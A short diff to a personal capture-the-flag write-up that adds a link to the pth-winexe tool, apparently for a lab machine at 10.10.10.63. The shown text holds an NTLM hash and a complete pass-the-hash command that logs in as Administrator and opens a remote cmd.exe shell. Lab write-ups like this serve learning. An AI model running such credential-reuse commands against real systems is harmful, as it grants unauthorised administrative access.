michaelyamout/writeups/index.md

 ```markdown
 aad3b435b51404eeaad3b435b51404ee:e0fb1fb85756c24235ff238cbe81fe00
 ```
 We can use a pass-the-hash attack to gain access to our target's machine as Administrator.
-We will use pth-winexe for this attack.
+We will use <a href="https://www.kali.org/blog/passing-hash-remote-desktop/">pth-winexe</a> for this attack.

 ```markdown
 pth-winexe -U Administrator%aad3b435b51404eeaad3b435b51404ee:e0fb1fb85756c24235ff238cbe81fe00 //10.10.10.63 cmd.exe